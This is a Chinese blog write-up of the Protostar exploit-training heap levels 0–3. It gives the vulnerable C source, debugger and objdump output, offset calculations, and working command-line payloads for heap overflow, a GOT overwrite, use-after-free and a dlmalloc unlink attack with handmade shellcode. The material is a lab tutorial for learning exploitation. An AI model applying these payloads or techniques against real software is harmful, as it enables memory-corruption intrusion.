Protostar Heap Write Up

最新推荐文章于 2023-09-05 22:01:46 发布
最新推荐文章于 2023-09-05 22:01:46 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: exploit 文章标签: pwn exploit heap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scnu_jiechao/article/details/78654888
版权

Protostar Heap0

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);

  f->fp();

}

思路:让data去覆盖fp,将fp指向winner

查看data与fp的偏移

$ ./heap0 A
data is at 0x8ef4008, fp is at 0x8ef4050
$ ./heap0 AB
data is at 0x8e7e008, fp is at 0x8e7e050

偏移量为0x50 - 0x08 = 0x48 = 72
查看winner的地址

$ gdb -q heap0
Reading symbols from heap0...done.
gdb-peda$ p winner
$1 = {void (void)} 0x8048464 <winner>

构造payload

/opt/protostar/bin/heap0 `python -c 'print "A"*72+"\x64\x84\x04\x08"'`

Protostar Heap1

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>



struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

思路:两个strcpy,可以进行任意地址写。因为i1->name和i2->name在strcpy前会指定写入地址。那么我们利用i1->name溢出覆盖指定i2->name地址为puts在got表中的地址,利用i2->name写入puts在got表中要跳转的地址为winner()的地址,那么程序在执行printf时,实际上就是执行winner。

查看i1在内存中的大概位置

$ ltrace ./heap1 AAAA BBBB
__libc_start_main(0x80484b9, 3, 0xbffffd94, 0x8048580, 0x8048570 <unfinished ...>
malloc(8)                                        = 0x0804a008
malloc(8)                                        = 0x0804a018
malloc(8)                                        = 0x0804a028
malloc(8)                                        = 0x0804a038
strcpy(0x0804a018, "AAAA")                       = 0x0804a018
strcpy(0x0804a038, "BBBB")                       = 0x0804a038
puts("and that's a wrap folks!"and that's a wrap folks!
)                 = 25
+++ exited (status 25) +++

i1是0x0804a008开始的,查看该地址附近的存储情况

$ gdb -q heap1
Reading symbols from /opt/protostar/bin/heap1...done.
(gdb) disassemble main
Dump of assembler code for function main:
...
0x08048561 <main+168>:  call   0x80483cc <puts@plt>
0x08048566 <main+173>:  leave  
0x08048567 <main+174>:  ret    
End of assembler dump.
(gdb) b *main+168
Breakpoint 1 at 0x8048561: file heap1/heap1.c, line 34.
(gdb) r AAAA BBBB
Starting program: /opt/protostar/bin/heap1 AAAA BBBB

Breakpoint 1, 0x08048561 in main (argc=3, argv=0xbffffd64) at heap1/heap1.c:34
34  heap1/heap1.c: No such file or directory.
    in heap1/heap1.c
(gdb) x/32x 0x0804a008 
0x804a008:  0x00000001  0x0804a018  0x00000000  0x00000011
0x804a018:  0x41414141  0x00000000  0x00000000  0x00000011
0x804a028:  0x00000002  0x0804a038  0x00000000  0x00000011
0x804a038:  0x42424242  0x00000000  0x00000000  0x00020fc1
0x804a048:  0x00000000  0x00000000  0x00000000  0x00000000
0x804a058:  0x00000000  0x00000000  0x00000000  0x00000000
0x804a068:  0x00000000  0x00000000  0x00000000  0x00000000
0x804a078:  0x00000000  0x00000000  0x00000000  0x00000000

指定i2->name写入地址的地址为0x804a02c,i1->name的地址为0x804a018,两者之间的偏移量为0x804a02c - 0x804a018 = 0x14 = 20

找puts在got表中的地址

$ objdump -R heap1 | grep puts
08049774 R_386_JUMP_SLOT   puts

得puts在got表中的地址为 0x08049774

找winner()的地址

$ objdump -d heap1 | grep winner
08048494 <winner>:

得winner()的地址为 0x08048494,构造payload

$ /opt/protostar/bin/heap1 `python -c 'print "A"*20+"\x74\x97\x04\x08"'` `python -c 'print "\x94\x84\x04\x08"'`
and we have a winner @ 1509326394

Protostar Heap2

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

struct auth {
  char name[32];
  int auth;
};

struct auth *auth;
char *service;

int main(int argc, char **argv)
{
  char line[128];

  while(1) {
      printf("[ auth = %p, service = %p ]\n", auth, service);

      if(fgets(line, sizeof(line), stdin) == NULL) break;

      if(strncmp(line, "auth ", 5) == 0) {
          auth = malloc(sizeof(auth));
          memset(auth, 0, sizeof(auth));
          if(strlen(line + 5) < 31) {
              strcpy(auth->name, line + 5);
          }
      }
      if(strncmp(line, "reset", 5) == 0) {
          free(auth);
      }
      if(strncmp(line, "service", 6) == 0) {
          service = strdup(line + 7);
      }
      if(strncmp(line, "login", 5) == 0) {
          if(auth->auth) {
              printf("you have logged in already!\n");
          } else {
              printf("please enter your password\n");
          }
      }
  }
}

思路:这份代码看起来很别扭。一个结构体的名字是auth,一个全局指针的名字是auth,结构体中的一个属性也叫auth,厉害了,我的哥… 目的是让auth->auth非空

$ ltrace ./heap2
__libc_start_main(0x8048934, 1, 0xbffffdb4, 0x804acc0, 0x804acb0 <unfinished ...>
printf("[ auth = %p, service = %p ]\n", (nil), (nil)[ auth = (nil), service = (nil) ]
) = 34
fgets(auth A
"auth A\n", 128, 0xb7fd8420)                 = 0xbffffc80
strncmp("auth A\n", "auth ", 5)                    = 0
sysconf(30, 0, 0xb7fe1b28, 1, 0)                   = 4096
sbrk(4096)                                         = 0x0804c000
sbrk(0)                                            = 0x0804d000
memset(0x0804c008, '\000', 4)                      = 0x0804c008

memset的第3个参数值是4,说明sizeof(auth)中的auth不是结构体auth,而是指针变量auth

$ ./heap2
[ auth = (nil), service = (nil) ]
auth A
[ auth = 0x804c008, service = (nil) ]
serviceA 
[ auth = 0x804c008, service = 0x804c018 ]

service的地址与auth的地址之间的偏移量为0x804c018 - 0x804c008 = 0x10 = 0x10 = 16 个字节,而auth本应占32 + 4 = 36个字节,也就是说service嵌入在本应是auth的地址空间里了。而auth->auth相对于auth地始地址的偏移量为32个字节,所以auth->auth相对于service的偏移量为32 - 16 = 16个字节,于是,只要service提供17-20个字节,就可以控制auth->auth。构造payload

$ ./heap2
[ auth = (nil), service = (nil) ]
auth A
[ auth = 0x804c008, service = (nil) ]
serviceAAAAAAAAAAAAAAAAB
[ auth = 0x804c008, service = 0x804c018 ]
login
you have logged in already!

Protostar Heap3

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}

思路:dlmalloc的unlink漏洞,利用free(b)触发unlink,将puts@got修改成执行winner()的shellcode。

对于dlmalloc内存,是通过块来管理的,块的结构体头部结构如下

struct chunk {
    int prev_size;  // 上一个块的大小
    int size;  // /8后是该块的大小,最低位表示上一块是否空闲,倒数第2位表示是否由mmap管理
    struct chunk *fd;  // 前一个块的指针,当前块空闲时有效
    struct chunk *bk;  // 后一个块的指针,当前块空闲时有效
};

执行free()时,检查向前合并(后一块与当前free块链接起来,当后一块空闲时会合并)和向后合并(前一块与当前free块链接起来,当前一块空闲时会合并)。向后合并时,先判断当前块的size的最低位,确定为0,也就是前一块空闲时,当前buffer指针 - prev_size,从而指向前一个块,再执行unlink

unlink(p, bck, fwd)
{
    bck = p->bk;
    fwd = p->fd;
    fwd->bk = bck;
    bck->fd = fwd;
}

我们可以通过前一个buffer去控制prev_size和size,比如将prev_size和size都设为-4,即
\xfc\xff\xff\xff,也就可以触发unlink。如果构造如下

unlink(p, bck, fwd)
{
    bck = p->bk;  // winner()
    fwd = p->fd;  // puts@got - 12
    fwd->bk = bck;  // fwd + 12 = puts@got => winnder()
    bck->fd = fwd;  // bck + 8 = winner() + 8 = puts@got - 12
}

留意第3句,是一个可以进行任意地址写的地方,所以我们就可以这里做文章。第4句将一个地址写到winner() + 8的位置,对代码段写入程序会崩,所以这里我们可以将winner()的执行制作成shellcode,然后放到a的buffer里,再构造如下

unlink(p, bck, fwd)
{
    bck = p->bk;  // shellcode地址
    fwd = p->fd;  // puts@got - 12
    fwd->bk = bck;  // fwd + 12 = puts@got => shellcode地址
    bck->fd = fwd;  // shellcode地址 + 8 = puts@got - 12
}

这样第4句就不会崩,在a的buffer里,前12(8 + 4(puts@got - 12地址占4字节))个字节不用了吧(想用的话也可以),用\x90过滤前12个字节,再上执行winner()的shellcode。所以得出攻击链路如下:

12个"\x90"+执行winner()的shellcode+补足的A+ "\xfc\xff\xff\xff"*2(一个用于prev_size,一个用于size) "BBBB"(p-(-4)=p+4)+(puts@got-12)+shellcode地址(a的buffer地址) C(第三个参数,正常的字符就可以)

查看winner()地址

$ objdump -d ./heap3 | grep winner
08048864 <winner>:

构造执行winner()的shellcode,也就是将winner()的地址放到栈里,然后利用ret指令,从栈取出地址并跳转过去

vim shellcode.asm
[section .text]
global _start
_start:
push 0x08048864
ret

编译链接

$ nasm -f elf shellcode.asm
$ ld -m elf_i386 -o shellcode shellcode.o

查看机器码

$ objdump -d ./shellcode

./shellcode:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:   68 64 88 04 08          push   $0x8048864
 8048065:   c3                      ret

得到执行winner()的shellcode为

\x68\x64\x88\x04\x08\xc3

共6个字节。除了前面的12个字节\x90和现在6个字节,a这个buffer还剩32 - 12 - 6 = 14个字节。

找puts@got的地址

$ objdump -R ./heap3 | grep puts
0804b128 R_386_JUMP_SLOT   puts

0x0804b128 - 12 = 0x0804b128 - 0x0c = 0x0804b11c

找a的buffer地址

$ ltrace ./heap3 AAAA BBBB CCCC
__libc_start_main(0x8048889, 4, 0xbffffd94, 0x804ab50, 0x804ab40 <unfinished ...>
sysconf(30, 0xb7ffeff4, 0xb7e9abb8, 1, 0xbffffc5c) = 4096
sbrk(4096)                                       = 0x0804c000
sbrk(0)                                          = 0x0804d000
strcpy(0x0804c008, "AAAA")                       = 0x0804c008
strcpy(0x0804c030, "BBBB")                       = 0x0804c030
strcpy(0x0804c058, "CCCC")                       = 0x0804c058
puts("dynamite failed?"dynamite failed?
)                         = 17
+++ exited (status 17) +++

得a的buffer地址为0x0804c008

构造payload

$ /opt/protostar/bin/heap3 `python -c 'print "\x90"*12+"\x68\x64\x88\x04\x08\xc3"+"A"*14+"\xfc\xff\xff\xff"*2'` `python -c 'print "BBBB\x1c\xb1\x04\x08\x08\xc0\x04\x08"'` C
that wasn't too bad now, was it? @ 1509599513

Protostar Heap4

页面 404

也没有相应的可执行程序heap4,期待ing…

jchalex
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
protostar-s:解决protostar挑战
02-14
原星 解决原星挑战
ProtoStar:通用高效IVC方案
mutourend的博客
08-15 560
斯坦福大学Benedikt B¨unz 以及 Espresso团队Binyi Chen 2023年论文Protostar: Generic Efficient Accumulation/Folding for Special-sound Protocols
exploit-exercise的protostar之stack0
公众号shadow sock7
07-14 597
在官方提供的虚拟机中,使用系统已经编译好的二进制可执行文件,可以实现stack overflow系统已经编译好的二进制文件user@protostar:~/repos$ ls /opt/protostar/bin/ final0 final2 format1 format3 heap0 heap2 net0 net2 net4 stack1 stack3 stack5
二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO
Ba1_Ma0的博客
08-31 2010
二进制安全虚拟机Protostar靶场
二进制安全虚拟机Protostar靶场(2)基础知识讲解,栈溢出覆盖变量 Stack One,Stack Two
最新发布
Ba1_Ma0的博客
09-05 985
二进制安全虚拟机Protostar靶场
StarkNet 配置 protostar 部署Cairo合约
ling1998的博客
03-28 868
StarkNet 配置 protostar 部署Cairo合约 操作系统 : Ubuntu 22.04安装git:可参考链接中的2.4.4。
Exploit-Exercises-Protostar:漏洞利用解决方案 Protostar
07-07
开发-练习-Protostar 漏洞利用解决方案 Protostar
protostar-relay:官方Relay devtool的开源迭代
03-20
原始中继Proto Relay是基于官方devtool的,用于React ...导航并选择文件夹:protostar-relay> Shells>浏览器> chrome>构建>解压缩 转到使用Relay构建的网站,然后打开“ proto *”面板。使用Relay的网站包括: 如何
exploit-exercises-arm:我已经接受了 Protostar 的所有挑战 - https
06-14
我已经接受了 Protostar 的所有挑战 - 并为 ARM 架构编译了它们。 我在本地使用的 QEMU 设置包括 -> 和 Radare2 Python 绑定。 我将在接下来的两周内添加格式、堆、网络和最终练习 - 很快回来查看! SSH # ...
protobuf 3.0 jar包
01-29
protobuf jar包,3.0版本、。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
Protostar Stack Write Up
无节操
11-08 1474
Protostar Stack0 #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you
Protostar Heap3 (hack the heap algorithm)
AlwaysBetter
09-05 6956
学习pwn快一个月了,从栈溢出,到格式化字符串漏洞,再到return to libc,再到heap UAF,double free,因为学习的protostar没有现代化防护手段,一路上比较顺利. 而在protostar堆类最后一道挑战,遇到了一些障碍,停滞了两天,不过好在liveoverflow讲的十分清晰,重复听了几遍,逐渐明白,这里记录下一个题解吧,作为我的pwn专栏第一篇文章 题目: 目标 使程序执行winner() 思路 首先可以确认的是,我们可以利用strcpy覆写堆中内容,想要执行win.
Exploit-Exercise之Protostar-heap
Yale的博客
07-20 709
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍heap部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x01 第一关heap0 这里可以看到存在缓冲区溢出的地方在d->n
The-Heap: protostar heap3
qq_25899635的博客
01-01 388
introduces 这个级别引入了Doug Lea Malloc(dlmalloc)以及如何修改堆元数据以改变程序执行 heap3.c: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h&gt...
exploit-exercises Protostar Heap Walkthrough
Casuall的博客
08-09 801
HeapProtostar Heap0AboutSource codeProtostar heap1AboutSource codeexpProtostar heap2AboutSource codeProtostar Heap3AboutSource codeexp 题目来源exploit-exercises Protostar Heap0 About This level introduces heap overflows and how they can influence code flow. Th
classic heap unlink exploit(protostar Heap3)
MillionSky的专栏
05-23 657
1 概述https://exploit-exercises.com/protostar/heap3/本题展示了classic heap unlink exploit。 前置技能:要了解ptmalloc堆;熟悉classic heap unlink exploit。2 题目Heap3.c#include &lt;stdlib.h&gt;#include &lt;unistd.h&gt;#includ...
传统栈溢出-(Exploit-exercise-protostar-stack5)
MillionSky的专栏
04-11 787
1 概述传统栈溢出有这些特点:没有ASLR没有NX 题目来自https://exploit-exercises.com/protostar/stack5/ 本来觉得很简单的,还是纠结了半天。Exploit-exercise-protostar-stack5的第一个坑就是setuid程序的core dump没有打开。需要这样操作:su - root #password:godmodeecho 1 &...
Protostar heap1
weixin_33709219的博客
04-27 118
AboutThis level takes a look at code flow hijacking in data overwrite cases.This level is at /opt/protostar/bin/heap1Source code#include <stdlib.h>#include <unistd.h>#include &l...
Protostar heap0
weixin_34372728的博客
04-21 108
AboutThis level introduces heap overflows and how they can influence code flow.This level is at /opt/protostar/bin/heap0Source code#include <stdlib.h>#include <unistd.h>#include...
Exploit Exercises Protostar Stack Part 0-7
giantbranch的专栏
08-03 1982
Stack0 首先看下源码 #include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值